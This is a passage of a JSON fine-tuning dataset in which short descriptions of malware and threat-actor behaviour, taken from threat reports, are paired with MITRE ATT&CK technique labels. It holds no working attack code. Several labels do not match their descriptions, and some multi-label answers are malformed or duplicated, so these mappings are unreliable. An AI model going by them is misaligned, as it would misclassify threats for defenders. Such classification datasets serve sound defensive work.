the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses systeminfo on a victim’s machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to delete its Registry key and scheduled task." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Update the RAT and Keylogger remotely - Set an autostart JavaScript to run on RAT startup - A Domain Generation Algorithm (DGA) for C2 resiliency - If the user has admin permissions, it deletes shadow copies using vssadmin.exe" }, { "role": "assistant", "content": "T1568.002 - Domain Generation Algorithms" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the ransomware is executed, Clop appends the .clop extension to the victim's files. We have observed different variants using different extensions, such as “.CIIp”, “.Cllp” and “.C_L_O_P”. Different versions of the ransom note have also been observed after encryption. Depending on the variant, any of these ransom text files could drop: “ClopReadMe.txt”, “README_README.txt”, “Cl0pReadMe.txt“ and “READ_ME_!!!.TXT" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "steals user files from network shared drives with file extensions and keywords that match a predefined list." }, { "role": "assistant", "content": "T1039 - Data from Network Shared Drive" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "manipulated .lnk files to gather user credentials in conjunction with ." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HELLOKITTY can delete volume shadow copies on compromised hosts." }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UBoatRAT checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some of the targeted apps were:   Whatsapp YouTube Video Downloader Google Update   Instagram Hack Wifi   AirDroid   WifiHacker   Facebook   Photoshop   SkyTV   Hotstar Trump Dash   PokemonGo With many more to come" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After reestablishing access, the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. At the time of writing, tmate sessions are the only way the attacker interacts with the compromised containers" }, { "role": "assistant", "content": "T1219 - Remote Access Software', 'T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers information about network adapters." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DropBook has checked for the presence of Arabic language in the infected machine's settings." }, { "role": "assistant", "content": "T1082 - System Information Discovery', 'T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "C2 traffic for most tools occurs over Port Numbers 53, 80, and 443." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes. Instead of using systeminfo and tasklist commands, the C# variant of Zebrocy uses WMI queries to gather this information" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERTON can use WMI for persistence." }, { "role": "assistant", "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Frankenstein, the threat actors exploited CVE-2017-11882 to execute code on the victim's machine." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "persistence: Somewhat interestingly, OSX/Dok persists in two phases. First as a Login Item, then as Launch Agents. When Dok is (naively) launched by the user, it will executed logic to persist as a Login Item. As their name implies, Login Items will execute an application when the user logs in. Apple describes how to create a Login Item both manually and programmatically" }, { "role": "assistant", "content": "T1059.002 - Command and Scripting Interpreter: AppleScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldMax has RSA-encrypted its communication with the C2 server." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use WinRM to execute a payload on a remote host." }, { "role": "assistant", "content": "T1021.006 - Remote Services: Windows Remote Management" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Ryuk group went from an email to domain wide ransomware in 29 hours and asked for over $6 million to unlock our systems. They used tools such as Cobalt Strike, AdFind, WMI, vsftpd, PowerShell, PowerView, and Rubeus to accomplish their objective." }, { "role": "assistant", "content": "T1588.002 - Tool', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Deep Panda has used \"-w hidden\" to conceal PowerShell windows by setting the WindowStyle parameter to hidden." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Send initial proxy module request. The initial request contains the bot ID, external IP address of the infected machine, reverse DNS lookup of the external IP address, internet speed (measured earlier) and seconds since the proxy module started. 2) Establish a connection (proxy commands sequence 1->10->11) with the PROXY-C2. 3) Initialize sessions, perform socks5 authorization with login/password (received from PROXY-C2 with command 10). 4) Begin SOCKS5-like communication wrapped into the QakBot proxy module protocol" }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LazyScripter has used several different security software icons to disguise executables." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay can collect data from removable media and stage it for exfiltration." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Maze has decrypted strings and other important information during the encryption process. Maze also calls certain functions dynamically to hinder analysis." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacSpy uses HTTP for command and control." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally. For systems that have not had MS17-010 applied, the EternalBlue and EternalRomance exploits are leveraged to compromise systems. The exploit launched against the victim system depends on the operating system of the intended target" }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kevin can create directories to store logs and other collected data." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Before being appended to image files, HAMMERTOSS commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The NtdsAudit utility is an auditing tool for Active Directory databases. It allows the user to collect useful statistics related to accounts and passwords. The utility was found on various systems of a victim and matches the NtdsAudit.exe program file version v2.0.5 published on the GitHub project page" }, { "role": "assistant", "content": "T1201 - Password Policy Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot can send information about the compromised host and upload data to a hardcoded C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37's Freenki malware lists running processes using the Microsoft Windows API." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The `Download3rdStage` will first decode `https://discord.com` and try to connect to it. Then, it performs a time-based anti-debug check, as shown in the code below. If any of these checks fail, the DLL will not download the third stage" }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Avaddon has enumerated shared folders and mapped volumes." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay can use UACMe for privilege escalation." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bisonal has used the Windows API to communicate with the Service Control Manager to execute a thread." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has used junk code within their DLL files to hinder analysis." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malicious Excel spreadsheet was discovered on Wednesday, Aug. 18, 2021, and it has a last modified date of Tuesday, Aug. 17. The filename had an .xlsb file extension. This file has macros designed to infect a vulnerable Windows host with BazarLoader. Figure 2 shows a screenshot of the Excel file." }, { "role": "assistant", "content": "T1137.001 - Office Application Startup: Office Template Macros.', 'T1587.001 - Malware', 'T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pony has used the \"NetUserEnum\" function to enumerate local accounts." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LockBit 2.0 is typically executed via command line arguments via a hidden window. Windows SysInternals PsExec has been utilized for both persistence and execution purposes. Its ability to execute processes on other systems spread the ransomware and assisted in reconnaissance activities." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Command Description 0x31 Fingerprint System via WMI and Registry 0x32 Drop File and execute 0x33 Remote Shell 0x34 Terminate connection with C2 0x35 Download and run batch script 0x36 Download file on machine 0x37 Upload File Table 2: FELIXROOT backdoor commands Figure 9 shows the log message decrypted from memory using the same mechanism shown in Figure 6 and Figure 7 for every command executed" }, { "role": "assistant", "content": "T1064 - Scripting', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrongPity can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TinyTurla has the ability to encrypt C2 traffic with SSL/TLS." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may use to add local firewall rule exceptions." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet reduces the integrity level of objects to allow write actions." }, { "role": "assistant", "content": "T1562 - Impair Defenses" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dok gives all users execute permissions for the application using the command \"chmod +x /Users/Shared/AppStore.app\"." }, { "role": "assistant", "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The GoldMax Linux variant has used a crontab entry with a \"@reboot\" line to gain persistence." }, { "role": "assistant", "content": "T1053.003 - Scheduled Task/Job: Cron" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Both variants of the BitPaymer malware feature multiple techniques to hinder analysis. The malware developers have employed a combination of encrypted strings, string hashes and dynamic API resolution to ensure that no strings exist in the binary" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts the message body of HTTP traffic with RC2 (in CBC mode) and Base64 encoding." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Other interesting keys include LSMinimumSystemVersion which indicates the (malicious) application is compatible with OSX 10.7 (Lion), and NSUIElement key which tells the OS to execute the application without a dock icon nor menu (i.e" }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KillDisk has used the \"FindNextFile\" command as part of its file deletion process." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "(Source: Dell SecureWorks) TG-3390 actors have also used the following publicly available tools: Windows Credential Editor (WCE) — obtains passwords from memory gsecdump — obtains passwords from memory winrar — compresses data for exfiltration nbtscan — scans NetBIOS name servers Tactics, techniques, and procedures Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can use `System` namespace methods to execute lateral movement using DCOM." }, { "role": "assistant", "content": "T1021.003 - Remote Services: Distributed Component Object Model" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The exported procedure HandlerW , responsible for parsing the arguments, shows that it is also possible to try to impersonate an anonymous token or try to steal another’s process token just for the execution of a command" }, { "role": "assistant", "content": "T1134.002 - Create Process with Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete used scheduled tasks for persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FALLCHILL is the primary component of a C2 infrastructure that uses multiple proxies to obfuscate network traffic between HIDDEN COBRA actors and a victim’s system. According to trusted third-party reporting, communication flows from the victim’s system to HIDDEN COBRA actors using a series of proxies as shown in figure 1" }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Command Description Action 0 Server response string contains batch commands Execute batch commands and send results back to server 1 Server response string is a file path Check for file path and upload (PUT) the file to server 2 Server response string is a file path Check for file path and download (GET) the file Table 1: POWRUNER commands After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution" }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1041 - Exfiltration Over C2 Channel', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aria-body has the ability to collect data from USB devices." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The instrumentor script also performs a cleanup of the cookies for Google Chrome and Microsoft Edge browsers. This is done by simply terminating any browser processes running on the system and then deleting the cookie files on disk" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf also uses file and folder names related to legitimate programs often found in Windows environments in order to blend in. Observed folder names include HP, Intel, Adobe, and perflogs and folders are generally created in either the root drive or the Application Data or Program Files folders. File names used in recent attacks include adobe.exe, adobe_sl.exe, intel.exe, and intellog.exe" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Persistence with BITS UBoatRAT achieves persistence by using Microsoft Windows Background Intelligent Transfer Service(BITS). BITS is a service for transferring files between machines. Though the most famous application using the service is Windows Update, other applications or users can take advantage of the component. The tool provides the option, /SetNotifyCmdLine which executes a program when the job finishes transferring data or is in error. UBoatRAT takes advantage of the option to ensure it stays running on a system, even after a reboot. After completing the copying the local file, BITS executes the UBoatRAT file configured with /SetNotifyCmdLine at the third line" }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke has modified UPX headers after packing files to break unpackers." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At this point, the script establishes an HTTP connection to the C2 server. If the server response is comprised only of the same GUID that the malware sent, the script deletes itself. In the case of the second-stage script from Variant A, the script deletes the registry key where it is installed. In the case of Variant C, the script deletes the file from which it is running. If instead the server responds with any data other than the GUID, the second-stage script decrypts the data and saves it as a file" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Malicious Word .doc file Besides the .pps file, the threat actor uses rich text files to deliver the malware. While other researchers have reported that these files exploit CVE-2012-0158, Symantec has also observed CVE-2015-1641 being exploited to drop Backdoor.Steladok" }, { "role": "assistant", "content": "T1189 - Drive-by Compromise', 'T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpyNote is similar to Droidjack and is also a commercial RAT. It is powerful and provides convenient management tools.. At present, the price of different versions on the official websited is $499 and $4000 respectively." }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An interesting fact is that the ransomware enumerates all running processes and compares the hashed name of each process with embedded hash values" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can check the compromised host for the presence of multiple executables associated with analysis tools and halt execution if any are found." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cardinal RAT can uninstall itself, including deleting its executable." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Darkhotel has used AES-256 and 3DES for C2 communications." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LockerGoga has been observed changing account passwords and logging off current users." }, { "role": "assistant", "content": "T1531 - Account Access Removal" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 has exfiltrated stolen data to the MEGA file sharing site." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Trojan.Karagany can gather information on the network configuration of a compromised host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has staged collected data files under \"C:\\Program Files\\Common Files\\System\\Ole DB\\\"." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has acquired credentials from the SAM/SECURITY registry hives." }, { "role": "assistant", "content": "T1003.002 - OS Credential Dumping: Security Account Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RATANKBA gathers information about the OS architecture, OS name, and OS version/Service pack." }, 